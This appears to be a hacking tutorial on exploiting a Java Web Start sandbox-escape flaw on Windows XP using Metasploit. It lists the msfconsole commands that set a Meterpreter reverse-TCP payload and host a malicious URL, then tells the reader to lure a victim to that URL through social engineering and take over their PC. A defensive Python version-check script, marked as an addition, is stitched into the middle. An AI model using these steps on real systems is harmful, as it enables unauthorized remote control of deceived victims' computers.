How to Attack a Remote PC through Sun Java Web Start Execution

This module exploits a vulnerability in the Java Runtime Environment that allows an attacker to escape the Java sandbox. By injecting a parameter into a javaws call within the BasicServiceImpl class, the default Java sandbox policy file can be overwritten. The vulnerability affects version 6 prior to update 22. NOTE: Exploiting this vulnerability causes several sinister-looking popup windows saying that Java is “Downloading application.”

Exploit Targets

Windows XP service pack 2

Windows XP service pack 3

Java 6 Standard Edition prior to update 22

Java 6 Standard Edition Update 10

Java 6 Standard Edition Update 18
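
A defender can turn the affected range stated above (Java 6 prior to update 22) into an inventory check. The following is an added example, not part of the original post or of Metasploit; the hostnames and `java -version` outputs are constructed, and it assumes the legacy 1.x.y_NN version string that Java 6 prints.

```python
import re

# Affected range as stated on this page: Java 6 prior to update 22.
AFFECTED_MAJOR = 6
FIXED_UPDATE = 22

# Matches the legacy string printed by `java -version`,
# e.g. java version "1.6.0_18" (no "_NN" suffix means update 0).
_VERSION_RE = re.compile(r'version "1\.(\d+)\.\d+(?:_(\d+))?[^"]*"')

def parse_java_version(text):
    """Return (major, update) from `java -version` output, or None."""
    m = _VERSION_RE.search(text)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2) or 0)

def is_affected(text):
    """True if in the affected range, False if not, None if unparseable."""
    parsed = parse_java_version(text)
    if parsed is None:
        return None
    major, update = parsed
    return major == AFFECTED_MAJOR and update < FIXED_UPDATE

def triage(inventory):
    """Split {host: version output} into affected / outside_range / unknown."""
    result = {"affected": [], "outside_range": [], "unknown": []}
    for host, output in sorted(inventory.items()):
        verdict = is_affected(output)
        key = "unknown" if verdict is None else (
            "affected" if verdict else "outside_range")
        result[key].append(host)
    return result

# Constructed sample inventory (hostnames and outputs are made up).
SAMPLE = {
    "ws-01": 'java version "1.6.0_18"\nJava(TM) SE Runtime Environment',
    "ws-02": 'java version "1.6.0_22"',
    "ws-03": 'java version "1.6.0"',
    "ws-04": 'java version "1.6.0_10-beta"',
    "ws-05": "'java' is not recognized as an internal or external command",
    "ws-06": 'java version "1.5.0_22"',
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE).items():
        print(status, hosts)
```

"outside_range" only means the host is not in the range this page names; hosts in "unknown" need a manual check.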

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open a BackTrack terminal and type msfconsole

Now type use exploit/windows/browser/java_basicservice_impl

Msf exploit (java_basicservice_impl)>set payload windows/meterpreter/reverse_tcp

Msf exploit (java_basicservice_impl)>set lhost 192.168.1.3 (IP of Local Host)

Msf exploit (java_basicservice_impl)>set srvhost 192.168.1.3 (This must be an address on the local machine)

Msf exploit (java_basicservice_impl)>set uripath javabasicservice (The URL to use for this exploit)

Msf exploit (java_basicservice_impl)>exploit

Now the URL you should give to your victim is http://192.168.1.3:8080/javabasicservice

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victim's PC. Use “sessions -l” to list the sessions and find the session number, then type “sessions -i ID” to connect to the session.
